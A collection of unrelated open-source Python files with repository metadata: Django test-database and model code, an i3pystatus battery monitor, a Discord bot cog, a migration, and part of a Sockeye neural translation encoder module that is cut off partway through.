self.connection.ensure_connection()
return test_database_name
def _get_test_db_name(self):
"""
Internal implementation - returns the name of the test DB that will be
created. Only useful when called from create_test_db() and
_create_test_db() and when no external munging is done with the 'NAME'
or 'TEST_NAME' settings.
"""
if self.connection.settings_dict['TEST']['NAME']:
return self.connection.settings_dict['TEST']['NAME']
return TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME']
def _create_test_db(self, verbosity, autoclobber):
"""
Internal implementation - creates the test db tables.
"""
suffix = self.sql_table_creation_suffix()
test_database_name = self._get_test_db_name()
qn = self.connection.ops.quote_name
# Create the test database and connect to it.
with self._nodb_connection.cursor() as cursor:
try:
cursor.execute(
"CREATE DATABASE %s %s" % (qn(test_database_name), suffix))
except Exception as e:
sys.stderr.write(
"Got an error creating the test database: %s\n" % e)
if not autoclobber:
confirm = input(
"Type 'yes' if you would like to try deleting the test "
"database '%s', or 'no' to cancel: " % test_database_name)
if autoclobber or confirm == 'yes':
try:
if verbosity >= 1:
print("Destroying old test database '%s'..."
% self.connection.alias)
cursor.execute(
"DROP DATABASE %s" % qn(test_database_name))
cursor.execute(
"CREATE DATABASE %s %s" % (qn(test_database_name),
suffix))
except Exception as e:
sys.stderr.write(
"Got an error recreating the test database: %s\n" % e)
sys.exit(2)
else:
print("Tests cancelled.")
sys.exit(1)
return test_database_name
def destroy_test_db(self, old_database_name, verbosity=1):
"""
Destroy a test database, prompting the user for confirmation if the
database already exists.
"""
self.connection.close()
test_database_name = self.connection.settings_dict['NAME']
if verbosity >= 1:
test_db_repr = ''
if verbosity >= 2:
test_db_repr = " ('%s')" % test_database_name
print("Destroying test database for alias '%s'%s..." % (
self.connection.alias, test_db_repr))
self._destroy_test_db(test_database_name, verbosity)
def _destroy_test_db(self, test_database_name, verbosity):
"""
Internal implementation - remove the test db tables.
"""
# Remove the test database to clean up after
# ourselves. Connect to the previous database (not the test database)
# to do so, because it's not allowed to delete a database while being
# connected to it.
with self._nodb_connection.cursor() as cursor:
# Wait to avoid "database is being accessed by other users" errors.
time.sleep(1)
cursor.execute("DROP DATABASE %s"
% self.connection.ops.quote_name(test_database_name))
def sql_table_creation_suffix(self):
"""
SQL to append to the end of the test table creation statements.
"""
return ''
def test_db_signature(self):
"""
Returns a tuple with elements of self.connection.settings_dict (a
DATABASES setting value) that uniquely identify a database
accordingly to the RDBMS particularities.
"""
settings_dict = self.connection.settings_dict
return (
settings_dict['HOST'],
settings_dict['PORT'],
settings_dict['ENGINE'],
settings_dict['NAME']
)
| {
"content_hash": "84f5a449f6544fc2dd1f8e9e6fdfffab",
"timestamp": "",
"source": "github",
"line_count": 486,
"max_line_length": 105,
"avg_line_length": 41.7201646090535,
"alnum_prop": 0.5645590846320774,
"repo_name": "mbox/django",
"id": "b2b82c13c2c5671abf0773669fe88427e357eb6e",
"size": "20276",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "django/db/backends/creation.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "52957"
},
{
"name": "JavaScript",
"bytes": "102668"
},
{
"name": "Python",
"bytes": "9362347"
},
{
"name": "Shell",
"bytes": "12137"
}
],
"symlink_target": ""
} |
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Author(models.Model):
name = models.CharField(max_length=50)
def __unicode__(self):
return self.name
class Tag(models.Model):
tag_name = models.CharField(max_length=30)
def __unicode__(self):
return self.tag_name
class Book(models.Model):
name_book = models.CharField(max_length=60)
authors = models.ManyToManyField(Author)
tags = models.ManyToManyField(Tag)
description = models.TextField(blank=True)
ISBN = models.CharField(max_length=20, blank=True)
publishing_house = models.CharField(max_length=20, blank=True)
year = models.IntegerField(blank=True)
quantity = models.IntegerField(blank=True)
likes = models.ManyToManyField(User)
def __unicode__(self):
return self.name_book
class Comment(models.Model):
book = models.ForeignKey(Book)
user = models.ForeignKey(User)
date = models.DateField()
comment = models.TextField()
def __unicode__(self):
return self.id_book
| {
"content_hash": "f9b22fc3d8e38cdaf0769a313e7d3c0f",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 66,
"avg_line_length": 25.488372093023255,
"alnum_prop": 0.6879562043795621,
"repo_name": "XenonSumback/stroustrup-back",
"id": "90ab0dfe7c3b6f270c27b215013cd8ce41f42534",
"size": "1139",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "books/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "25678"
}
],
"symlink_target": ""
} |
import os
import re
import configparser
from i3pystatus import IntervalModule, formatp
from i3pystatus.core.util import lchop, TimeWrapper, make_bar
from i3pystatus.core.desktop import DesktopNotification
from i3pystatus.core.command import run_through_shell
class UEventParser(configparser.ConfigParser):
@staticmethod
def parse_file(file):
parser = UEventParser()
with open(file, "r") as file:
parser.read_string(file.read())
return dict(parser.items("id10t"))
def __init__(self):
super().__init__(default_section="id10t")
def optionxform(self, key):
return lchop(key, "POWER_SUPPLY_")
def read_string(self, string):
super().read_string("[id10t]\n" + string)
class Battery:
@staticmethod
def create(from_file):
battery_info = UEventParser.parse_file(from_file)
if "POWER_NOW" in battery_info:
return BatteryEnergy(battery_info)
else:
return BatteryCharge(battery_info)
def __init__(self, battery_info):
self.battery_info = battery_info
self.normalize_micro()
def normalize_micro(self):
for key, micro_value in self.battery_info.items():
if re.match(r"(VOLTAGE|CHARGE|CURRENT|POWER|ENERGY)_(NOW|FULL|MIN)(_DESIGN)?", key):
self.battery_info[key] = float(micro_value) / 1000000.0
def percentage(self, design=False):
return self._percentage("_DESIGN" if design else "") * 100
def status(self):
if self.consumption() is None:
return self.battery_info["STATUS"]
elif self.consumption() > 0.1 and self.percentage() < 99.9:
return "Discharging" if self.battery_info["STATUS"] == "Discharging" else "Charging"
elif self.consumption() == 0 and self.percentage() == 0.00:
return "Depleted"
else:
return "Full"
def consumption(self, val):
return val if val > 0.1 else 0
class BatteryCharge(Battery):
def __init__(self, bi):
bi["CHARGE_FULL"] = bi["CHARGE_FULL_DESIGN"] if bi["CHARGE_NOW"] > bi["CHARGE_FULL"] else bi["CHARGE_FULL"]
super().__init__(bi)
def consumption(self):
if "VOLTAGE_NOW" in self.battery_info and "CURRENT_NOW" in self.battery_info:
return super().consumption(self.battery_info["VOLTAGE_NOW"] * self.battery_info["CURRENT_NOW"]) # V * A = W
else:
return None
def _percentage(self, design):
return self.battery_info["CHARGE_NOW"] / self.battery_info["CHARGE_FULL" + design]
def wh_remaining(self):
return self.battery_info['CHARGE_NOW'] * self.battery_info['VOLTAGE_NOW']
def wh_depleted(self):
return (self.battery_info['CHARGE_FULL'] - self.battery_info['CHARGE_NOW']) * self.battery_info['VOLTAGE_NOW']
def remaining(self):
if self.status() == "Discharging":
if "CHARGE_NOW" in self.battery_info and "CURRENT_NOW" in self.battery_info:
# Ah / A = h * 60 min = min
return self.battery_info["CHARGE_NOW"] / self.battery_info["CURRENT_NOW"] * 60
else:
return -1
else:
return (self.battery_info["CHARGE_FULL"] - self.battery_info["CHARGE_NOW"]) / self.battery_info[
"CURRENT_NOW"] * 60
class BatteryEnergy(Battery):
def consumption(self):
return super().consumption(self.battery_info["POWER_NOW"])
def _percentage(self, design):
return self.battery_info["ENERGY_NOW"] / self.battery_info["ENERGY_FULL" + design]
def wh_remaining(self):
return self.battery_info['ENERGY_NOW']
def wh_depleted(self):
return self.battery_info['ENERGY_FULL'] - self.battery_info['ENERGY_NOW']
def remaining(self):
if self.status() == "Discharging":
# Wh / W = h * 60 min = min
return self.battery_info["ENERGY_NOW"] / self.battery_info["POWER_NOW"] * 60
else:
return (self.battery_info["ENERGY_FULL"] - self.battery_info["ENERGY_NOW"]) / self.battery_info[
"POWER_NOW"] * 60
class BatteryChecker(IntervalModule):
"""
This class uses the /sys/class/power_supply/…/uevent interface to check for the
battery status
It provides the "ALL" battery_ident which will summarise all available batteries
for the moment and aggregate the % as well as the time remaining on the charge.
.. rubric:: Available formatters
* `{remaining}` — remaining time for charging or discharging, uses TimeWrapper formatting, default format is `%E%h:%M`
* `{percentage}` — battery percentage relative to the last full value
* `{percentage_design}` — absolute battery charge percentage
* `{consumption (Watts)}` — current power flowing into/out of the battery
* `{status}`
* `{no_of_batteries}` — The number of batteries included
* `{battery_ident}` — the same as the setting
* `{bar}` —bar displaying the relative percentage graphically
* `{bar_design}` —bar displaying the absolute percentage graphically
"""
settings = (
("battery_ident", "The name of your battery, usually BAT0 or BAT1"),
"format",
("not_present_text", "Text displayed if the battery is not present. No formatters are available"),
("alert", "Display a libnotify-notification on low battery"),
("critical_level_command", "Runs a shell command in the case of a critical power state"),
"critical_level_percentage",
"alert_percentage",
("alert_format_title", "The title of the notification, all formatters can be used"),
("alert_format_body", "The body text of the notification, all formatters can be used"),
("path", "Override the default-generated path and specify the full path for a single battery"),
("base_path", "Override the default base path for searching for batteries"),
("battery_prefix", "Override the default battery prefix"),
("status", "A dictionary mapping ('DPL', 'DIS', 'CHR', 'FULL') to alternative names"),
("color", "The text color"),
("full_color", "The full color"),
("charging_color", "The charging color"),
("critical_color", "The critical color"),
("not_present_color", "The not present color."),
("not_present_text", "The text to display when the battery is not present. Provides {battery_ident} as formatting option"),
("no_text_full", "Don't display text when battery is full - 100%"),
)
battery_ident = "ALL"
format = "{status} {remaining}"
status = {
"DPL": "DPL",
"CHR": "CHR",
"DIS": "DIS",
"FULL": "FULL",
}
not_present_text = "Battery {battery_ident} not present"
alert = False
critical_level_command = ""
critical_level_percentage = 1
alert_percentage = 10
alert_format_title = "Low battery"
alert_format_body = "Battery {battery_ident} has only {percentage:.2f}% ({remaining:%E%hh:%Mm}) remaining!"
color = "#ffffff"
full_color = "#00ff00"
charging_color = "#00ff00"
critical_color = "#ff0000"
not_present_color = "#ffffff"
no_text_full = False
battery_prefix = 'BAT'
base_path = '/sys/class/power_supply'
path = None
paths = []
def percentage(self, batteries, design=False):
total = 0
for battery in batteries:
total += battery.percentage(design)
return total / len(batteries)
def consumption(self, batteries):
consumption = 0
for battery in batteries:
if battery.consumption() is not None:
consumption += battery.consumption()
return consumption
def abs_consumption(self, batteries):
abs_consumption = 0
for battery in batteries:
if battery.consumption() is None:
continue
if battery.status() == 'Discharging':
abs_consumption -= battery.consumption()
elif battery.status() == 'Charging':
abs_consumption += battery.consumption()
return abs_consumption
def battery_status(self, batteries):
abs_consumption = self.abs_consumption(batteries)
if abs_consumption > 0:
return 'Charging'
elif abs_consumption < 0:
return 'Discharging'
else:
return batteries[-1].status()
def remaining(self, batteries):
wh_depleted = 0
wh_remaining = 0
abs_consumption = self.abs_consumption(batteries)
for battery in batteries:
wh_remaining += battery.wh_remaining()
wh_depleted += battery.wh_depleted()
if abs_consumption == 0:
return 0
elif abs_consumption > 0:
return wh_depleted / self.consumption(batteries) * 60
elif abs_consumption < 0:
return wh_remaining / self.consumption(batteries) * 60
def init(self):
if not self.paths or (self.path and self.path not in self.paths):
bat_dir = self.base_path
if os.path.exists(bat_dir) and not self.path:
_, dirs, _ = next(os.walk(bat_dir))
all_bats = [x for x in dirs if x.startswith(self.battery_prefix)]
for bat in all_bats:
self.paths.append(os.path.join(bat_dir, bat, 'uevent'))
if self.path:
self.paths = [self.path]
def run(self):
urgent = False
color = self.color
batteries = []
for path in self.paths:
if self.battery_ident == 'ALL' or path.find(self.battery_ident) >= 0:
try:
batteries.append(Battery.create(path))
except FileNotFoundError:
pass
if not batteries:
format_dict = {'battery_ident': self.battery_ident}
self.output = {
"full_text": formatp(self.not_present_text, **format_dict),
"color": self.not_present_color,
}
return
if self.no_text_full:
if self.battery_status(batteries) == "Full":
self.output = {
"full_text": ""
}
return
fdict = {
"battery_ident": self.battery_ident,
"no_of_batteries": len(batteries),
"percentage": self.percentage(batteries),
"percentage_design": self.percentage(batteries, design=True),
"consumption": self.consumption(batteries),
"remaining": TimeWrapper(0, "%E%h:%M"),
"bar": make_bar(self.percentage(batteries)),
"bar_design": make_bar(self.percentage(batteries, design=True)),
}
status = self.battery_status(batteries)
if status in ["Charging", "Discharging"]:
remaining = self.remaining(batteries)
fdict["remaining"] = TimeWrapper(remaining * 60, "%E%h:%M")
if status == "Discharging":
fdict["status"] = "DIS"
if self.percentage(batteries) <= self.alert_percentage:
urgent = True
color = self.critical_color
else:
fdict["status"] = "CHR"
color = self.charging_color
elif status == 'Depleted':
fdict["status"] = "DPL"
color = self.critical_color
else:
fdict["status"] = "FULL"
color = self.full_color
if self.critical_level_command and fdict["status"] == "DIS" and fdict["percentage"] <= self.critical_level_percentage:
run_through_shell(self.critical_level_command, enable_shell=True)
if self.alert and fdict["status"] == "DIS" and fdict["percentage"] <= self.alert_percentage:
DesktopNotification(
title=formatp(self.alert_format_title, **fdict),
body=formatp(self.alert_format_body, **fdict),
icon="battery-caution",
urgency=2,
timeout=60,
).display()
fdict["status"] = self.status[fdict["status"]]
self.data = fdict
self.output = {
"full_text": formatp(self.format, **fdict),
"instance": self.battery_ident,
"urgent": urgent,
"color": color,
}
| {
"content_hash": "10d13fe7d15a61d8a33e44b6636a15c7",
"timestamp": "",
"source": "github",
"line_count": 322,
"max_line_length": 131,
"avg_line_length": 38.56832298136646,
"alnum_prop": 0.5881310894596988,
"repo_name": "juliushaertl/i3pystatus",
"id": "93eef7dce4ea7f8a4c8ccd13af972076e195e004",
"size": "12437",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "i3pystatus/battery.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "282586"
},
{
"name": "Shell",
"bytes": "801"
}
],
"symlink_target": ""
} |
import discord
from discord.ext import commands
class Misc(commands.Cog):
"""I'm not very good at categorizing things."""
def __init__(self, bot):
self.chiaki = bot
@commands.command()
async def say(self, context, *, repeat):
"""A generic repeat command."""
await context.send(repeat)
@commands.command()
async def handhold(self, context):
"""Sex is lewd because it can lead to handholding."""
await context.send('That\'s l-lewd!')
@commands.command()
async def nerd(self, context, *, user):
"""Determines if user is a nerd."""
user = await self.chiaki.get_cog('Nicknames').get_member(context, user)
if not user:
response = 'I don\'t know who that is?'
# that's me!
elif user.id == 106971793868197888:
response = '{0} is a cute anime girl.'.format(user.display_name)
elif user.bot:
response = '..........'
else:
response = '{0} is most definitely a nerd.'.format(user.display_name)
await context.send(response)
@commands.command()
async def icon(self, context, *, user):
"""Links to a larger version of the user's icon."""
user = await self.chiaki.get_cog('Nicknames').get_member(context, user)
if not user:
response = 'I don\'t know who that is?'
else:
response = user.avatar_url
await context.send(response)
def setup(bot):
bot.add_cog(Misc(bot))
| {
"content_hash": "aeef088c34e76951496b8ee715775abf",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 81,
"avg_line_length": 34.666666666666664,
"alnum_prop": 0.5692307692307692,
"repo_name": "adelie/chiakibot",
"id": "5a319e919290b349fc97716711e4558a8408fa57",
"size": "1560",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cogs/misc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "30899"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("contentstore", "0003_auto_20160513_1115")]
operations = [
migrations.AlterField(
model_name="message",
name="binary_content",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="message",
to="contentstore.BinaryContent",
),
)
]
| {
"content_hash": "0d6e14f3301c0f548286939e643eeb06",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 64,
"avg_line_length": 26.73913043478261,
"alnum_prop": 0.5739837398373984,
"repo_name": "praekelt/seed-stage-based-messaging",
"id": "cc06d2437373d76fb10362931b67e9132c436b3a",
"size": "687",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "contentstore/migrations/0004_auto_20160810_0916.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Dockerfile",
"bytes": "371"
},
{
"name": "HTML",
"bytes": "1428"
},
{
"name": "Python",
"bytes": "306458"
}
],
"symlink_target": ""
} |
"""
Encoders for sequence-to-sequence models.
"""
import inspect
import logging
from abc import ABC, abstractmethod
from math import ceil, floor
from typing import Callable, List, Optional, Tuple, Union, Dict
import mxnet as mx
from . import config
from . import constants as C
from . import convolution
from . import rnn
from . import transformer
from . import utils
logger = logging.getLogger(__name__)
ImageEncoderConfig = None
def get_encoder(config: 'EncoderConfig', prefix: str = '') -> 'Encoder':
if isinstance(config, RecurrentEncoderConfig):
return get_recurrent_encoder(config, prefix)
elif isinstance(config, transformer.TransformerConfig):
return get_transformer_encoder(config, prefix)
elif isinstance(config, ConvolutionalEncoderConfig):
return get_convolutional_encoder(config, prefix)
elif isinstance(config, EmptyEncoderConfig):
return EncoderSequence([EmptyEncoder(config)], config.dtype)
else:
from .image_captioning.encoder import ImageLoadedCnnEncoderConfig, \
get_image_cnn_encoder
if isinstance(config, ImageLoadedCnnEncoderConfig):
return get_image_cnn_encoder(config)
else:
raise ValueError("Unsupported encoder configuration")
class RecurrentEncoderConfig(config.Config):
"""
Recurrent encoder configuration.
:param rnn_config: RNN configuration.
:param conv_config: Optional configuration for convolutional embedding.
:param reverse_input: Reverse embedding sequence before feeding into RNN.
:param dtype: Data type.
"""
def __init__(self,
rnn_config: rnn.RNNConfig,
conv_config: Optional['ConvolutionalEmbeddingConfig'] = None,
reverse_input: bool = False,
dtype: str = C.DTYPE_FP32) -> None:
super().__init__()
self.rnn_config = rnn_config
self.conv_config = conv_config
self.reverse_input = reverse_input
self.dtype = dtype
class ConvolutionalEncoderConfig(config.Config):
"""
Convolutional encoder configuration.
:param cnn_config: CNN configuration.
:param num_layers: The number of convolutional layers on top of the embeddings.
:param positional_embedding_type: The type of positional embedding.
:param dtype: Data type.
"""
def __init__(self,
num_embed: int,
max_seq_len_source: int,
cnn_config: convolution.ConvolutionConfig,
num_layers: int,
positional_embedding_type: str,
dtype: str = C.DTYPE_FP32) -> None:
super().__init__()
self.num_embed = num_embed
self.num_layers = num_layers
self.cnn_config = cnn_config
self.max_seq_len_source = max_seq_len_source
self.positional_embedding_type = positional_embedding_type
self.dtype = dtype
class EmptyEncoderConfig(config.Config):
"""
Empty encoder configuration.
:param num_embed: source embedding size.
:param num_hidden: the representation size of this encoder.
:param dtype: Data type.
"""
def __init__(self,
num_embed: int,
num_hidden: int,
dtype: str = C.DTYPE_FP32) -> None:
super().__init__()
self.num_embed = num_embed
self.num_hidden = num_hidden
self.dtype = dtype
self.allow_missing = True
def get_recurrent_encoder(config: RecurrentEncoderConfig, prefix: str) -> 'Encoder':
"""
Returns an encoder stack with a bi-directional RNN, and a variable number of uni-directional forward RNNs.
:param config: Configuration for recurrent encoder.
:param prefix: Prefix for variable names.
:return: Encoder instance.
"""
# TODO give more control on encoder architecture
encoder_seq = EncoderSequence([], config.dtype)
if config.conv_config is not None:
encoder_seq.append(ConvolutionalEmbeddingEncoder, config=config.conv_config,
prefix=prefix + C.CHAR_SEQ_ENCODER_PREFIX)
if config.conv_config.add_positional_encoding:
# If specified, add positional encodings to segment embeddings
encoder_seq.append(AddSinCosPositionalEmbeddings,
num_embed=config.conv_config.num_embed,
scale_up_input=False,
scale_down_positions=False,
prefix="%s%sadd_positional_encodings" % (prefix, C.CHAR_SEQ_ENCODER_PREFIX))
encoder_seq.append(ConvertLayout, infer_hidden=True, target_layout=C.TIME_MAJOR)
else:
encoder_seq.append(ConvertLayout, target_layout=C.TIME_MAJOR, num_hidden=0)
if config.reverse_input:
encoder_seq.append(ReverseSequence, infer_hidden=True)
if config.rnn_config.residual:
utils.check_condition(config.rnn_config.first_residual_layer >= 2,
"Residual connections on the first encoder layer are not supported")
# One layer bi-directional RNN:
encoder_seq.append(BiDirectionalRNNEncoder,
rnn_config=config.rnn_config.copy(num_layers=1),
prefix=prefix + C.BIDIRECTIONALRNN_PREFIX,
layout=C.TIME_MAJOR)
if config.rnn_config.num_layers > 1:
# Stacked uni-directional RNN:
# Because we already have a one layer bi-rnn we reduce the num_layers as well as the first_residual_layer.
remaining_rnn_config = config.rnn_config.copy(num_layers=config.rnn_config.num_layers - 1,
first_residual_layer=config.rnn_config.first_residual_layer - 1)
encoder_seq.append(RecurrentEncoder,
rnn_config=remaining_rnn_config,
prefix=prefix + C.STACKEDRNN_PREFIX,
layout=C.TIME_MAJOR)
encoder_seq.append(ConvertLayout, infer_hidden=True, target_layout=C.BATCH_MAJOR)
return encoder_seq
def get_convolutional_encoder(config: ConvolutionalEncoderConfig, prefix: str) -> 'Encoder':
"""
Creates a convolutional encoder.
:param config: Configuration for convolutional encoder.
:param prefix: Prefix for variable names.
:return: Encoder instance.
"""
encoder_seq = EncoderSequence([], dtype=config.dtype)
cls, encoder_params = _get_positional_embedding_params(config.positional_embedding_type,
config.num_embed,
max_seq_len=config.max_seq_len_source,
fixed_pos_embed_scale_up_input=False,
fixed_pos_embed_scale_down_positions=True,
prefix=prefix + C.SOURCE_POSITIONAL_EMBEDDING_PREFIX)
encoder_seq.append(cls, **encoder_params)
encoder_seq.append(ConvolutionalEncoder, config=config)
return encoder_seq
def get_transformer_encoder(config: transformer.TransformerConfig, prefix: str) -> 'Encoder':
"""
Returns a Transformer encoder, consisting of an embedding layer with
positional encodings and a TransformerEncoder instance.
:param config: Configuration for transformer encoder.
:param prefix: Prefix for variable names.
:return: Encoder instance.
"""
encoder_seq = EncoderSequence([], dtype=config.dtype)
cls, encoder_params = _get_positional_embedding_params(config.positional_embedding_type,
config.model_size,
config.max_seq_len_source,
fixed_pos_embed_scale_up_input=True,
fixed_pos_embed_scale_down_positions=False,
prefix=prefix + C.SOURCE_POSITIONAL_EMBEDDING_PREFIX)
encoder_seq.append(cls, **encoder_params)
if config.conv_config is not None:
encoder_seq.append(ConvolutionalEmbeddingEncoder, config=config.conv_config,
prefix=prefix + C.CHAR_SEQ_ENCODER_PREFIX)
encoder_seq.append(TransformerEncoder, config=config, prefix=prefix + C.TRANSFORMER_ENCODER_PREFIX)
return encoder_seq
class Encoder(ABC):
"""
Generic encoder interface.
:param dtype: Data type.
"""
@abstractmethod
def __init__(self, dtype):
logger.info('{}.{} dtype: {}'.format(self.__module__, self.__class__.__name__, dtype))
self.dtype = dtype
@abstractmethod
def encode(self,
data: mx.sym.Symbol,
data_length: Optional[mx.sym.Symbol],
seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
"""
Encodes data given sequence lengths of individual examples and maximum sequence length.
:param data: Input data.
:param data_length: Vector with sequence lengths.
:param seq_len: Maximum sequence length.
:return: Encoded versions of input data (data, data_length, seq_len).
"""
pass
@abstractmethod
def get_num_hidden(self) -> int:
"""
:return: The representation size of this encoder.
"""
raise NotImplementedError()
def get_encoded_seq_len(self, seq_len: int) -> int:
"""
:return: The size of the encoded sequence.
"""
return seq_len
def get_max_seq_len(self) -> Optional[int]:
"""
:return: The maximum length supported by the encoder if such a restriction exists.
"""
return None
class ConvertLayout(Encoder):
"""
Converts batch major data to time major by swapping the first dimension and setting the __layout__ attribute.
:param target_layout: The target layout to convert to (C.BATCH_MAJOR or C.TIMEMAJOR).
:param num_hidden: The number of hidden units of the previous encoder.
:param dtype: Data type.
"""
def __init__(self, target_layout: str, num_hidden: int, dtype: str = C.DTYPE_FP32) -> None:
assert target_layout == C.BATCH_MAJOR or target_layout == C.TIME_MAJOR
super().__init__(dtype)
self.num_hidden = num_hidden
self.target_layout = target_layout
def encode(self,
data: mx.sym.Symbol,
data_length: Optional[mx.sym.Symbol],
seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
"""
Encodes data given sequence lengths of individual examples and maximum sequence length.
:param data: Input data.
:param data_length: Vector with sequence lengths.
:param seq_len: Maximum sequence length.
:return: Encoded versions of input data (data, data_length, seq_len).
"""
with mx.AttrScope(__layout__=self.target_layout):
return mx.sym.swapaxes(data=data, dim1=0, dim2=1), data_length, seq_len
def get_num_hidden(self) -> int:
return self.num_hidden
class ReverseSequence(Encoder):
"""
Reverses the input sequence. Requires time-major layout.
:param dtype: Data type.
"""
def __init__(self, num_hidden: int, dtype: str = C.DTYPE_FP32) -> None:
super().__init__(dtype)
self.num_hidden = num_hidden
def encode(self,
data: mx.sym.Symbol,
data_length: mx.sym.Symbol,
seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
data = mx.sym.SequenceReverse(data=data, sequence_length=data_length, use_sequence_length=True)
return data, data_length, seq_len
def get_num_hidden(self):
return self.num_hidden
class FactorConfig(config.Config):
def __init__(self, vocab_size: int, num_embed: int) -> None:
super().__init__()
self.vocab_size = vocab_size
self.num_embed = num_embed
class EmbeddingConfig(config.Config):
def __init__(self,
vocab_size: int,
num_embed: int,
dropout: float,
factor_configs: Optional[List[FactorConfig]] = None,
dtype: str = C.DTYPE_FP32) -> None:
super().__init__()
self.vocab_size = vocab_size
self.num_embed = num_embed
self.dropout = dropout
self.factor_configs = factor_configs
self.num_factors = 1
if self.factor_configs is not None:
self.num_factors += len(self.factor_configs)
self.dtype = dtype
class Embedding(Encoder):
"""
Thin wrapper around MXNet's Embedding symbol. Works with both time- and batch-major data layouts.
:param config: Embedding config.
:param prefix: Name prefix for symbols of this encoder.
:param embed_weight: Optionally use an existing embedding matrix instead of creating a new one.
:param is_source: Whether this is the source embedding instance. Default: False.
"""
def __init__(self,
config: EmbeddingConfig,
prefix: str,
embed_weight: Optional[mx.sym.Symbol] = None,
is_source: bool = False) -> None:
super().__init__(config.dtype)
self.config = config
self.prefix = prefix
self.embed_weight = embed_weight
self.is_source = is_source
if self.embed_weight is None:
self.embed_weight = mx.sym.Variable(prefix + "weight",
shape=(self.config.vocab_size, self.config.num_embed))
self.embed_factor_weights = [] # type: List[mx.sym.Symbol]
if self.config.factor_configs is not None:
# Factors weights aren't shared so they're not passed in and we create them here.
for i, fc in enumerate(self.config.factor_configs):
self.embed_factor_weights.append(mx.sym.Variable(prefix + "factor%d_weight" % i,
shape=(fc.vocab_size, fc.num_embed)))
def encode(self,
data: mx.sym.Symbol,
data_length: Optional[mx.sym.Symbol],
seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
"""
Encodes data given sequence lengths of individual examples and maximum sequence length.
:param data: Input data.
:param data_length: Vector with sequence lengths.
:param seq_len: Maximum sequence length.
:return: Encoded versions of input data (data, data_length, seq_len).
"""
factor_embeddings = [] # type: List[mx.sym.Symbol]
if self.is_source:
data, *data_factors = mx.sym.split(data=data,
num_outputs=self.config.num_factors,
axis=2,
squeeze_axis=True, name=self.prefix + "factor_split")
if self.config.factor_configs is not None:
for i, (factor_data, factor_config, factor_weight) in enumerate(zip(data_factors,
self.config.factor_configs,
self.embed_factor_weights)):
factor_embeddings.append(mx.sym.Embedding(data=factor_data,
input_dim=factor_config.vocab_size,
weight=factor_weight,
output_dim=factor_config.num_embed,
name=self.prefix + "factor%d_embed" % i))
embedding = mx.sym.Embedding(data=data,
input_dim=self.config.vocab_size,
weight=self.embed_weight,
output_dim=self.config.num_embed,
name=self.prefix + "embed")
if self.config.factor_configs is not None:
embedding = mx.sym.concat(embedding, *factor_embeddings, dim=2, name=self.prefix + "embed_plus_factors")
if self.config.dropout > 0:
embedding = mx.sym.Dropout(data=embedding, p=self.config.dropout, name="source_embed_dropout")
return embedding, data_length, seq_len
def get_num_hidden(self) -> int:
"""
Return the representation size of this encoder.
"""
return self.config.num_embed
class PassThroughEmbeddingConfig(EmbeddingConfig):
def __init__(self) -> None:
super().__init__(vocab_size=0, num_embed=0, dropout=0.0, factor_configs=None)
class PassThroughEmbedding(Encoder):
"""
This is an embedding which passes through an input symbol without doing any operation.
:param config: PassThroughEmbeddingConfig config.
"""
def __init__(self,
config: PassThroughEmbeddingConfig) -> None:
super().__init__('float32')
self.config = config
def encode(self,
data: mx.sym.Symbol,
data_length: Optional[mx.sym.Symbol],
seq_len: int = 0) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
"""
Encodes data given sequence lengths of individual examples and maximum sequence length.
:param data: Input data.
:param data_length: Vector with sequence lengths.
:return: Encoded versions of input data (data, data_length, seq_len).
"""
return data, data_length, seq_len
def get_num_hidden(self) -> int:
"""
Return the representation size of this encoder.
"""
return 0
class PositionalEncoder(Encoder):
@abstractmethod
def encode_positions(self,
positions: mx.sym.Symbol,
data: mx.sym.Symbol) -> mx.sym.Symbol:
"""
Add positional encodings to the data using the provided positions.
:param positions: (batch_size,)
:param data: (batch_size, num_embed)
:return: (batch_size, num_embed)
"""
pass
class AddSinCosPositionalEmbeddings(PositionalEncoder):
"""
Takes an encoded sequence and adds fixed positional embeddings as in Vaswani et al, 2017 to it.
:param num_embed: Embedding size.
:param prefix: Name prefix for symbols of this encoder.
:param scale_up_input: If True, scales input data up by num_embed ** 0.5.
:param scale_down_positions: If True, scales positional embeddings down by num_embed ** -0.5.
:param dtype: Data type.
"""
def __init__(self,
num_embed: int,
prefix: str,
scale_up_input: bool,
scale_down_positions: bool,
dtype: str = C.DTYPE_FP32) -> None:
utils.check_condition(num_embed % 2 == 0, "Positional embeddings require an even embedding size it "
"is however %d." % num_embed)
super().__init__(dtype)
self.scale_up_input = scale_up_input
self.scale_down_positions = scale_down_positions
self.num_embed = num_embed
self.prefix = prefix
def encode(self,
data: mx.sym.Symbol,
data_length: Optional[mx.sym.Symbol],
seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
"""
:param data: (batch_size, source_seq_len, num_embed)
:param data_length: (batch_size,)
:param seq_len: sequence length.
:return: (batch_size, source_seq_len, num_embed)
"""
# add positional embeddings to data
if self.scale_up_input:
data = data * (self.num_embed ** 0.5)
positions = mx.sym.BlockGrad(mx.symbol.Custom(length=seq_len,
